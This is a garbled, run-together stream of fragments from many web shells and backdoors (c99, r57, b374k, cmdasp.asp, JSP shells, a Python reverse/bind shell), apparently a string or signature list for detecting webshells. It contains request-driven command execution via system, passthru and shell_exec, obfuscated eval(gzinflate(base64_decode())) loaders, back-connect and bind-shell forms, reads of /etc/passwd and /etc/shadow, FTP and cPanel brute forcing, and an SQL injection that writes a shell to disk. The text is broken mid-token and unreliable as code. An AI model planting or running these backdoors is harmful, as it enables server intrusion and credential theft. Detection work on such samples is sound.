(move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || 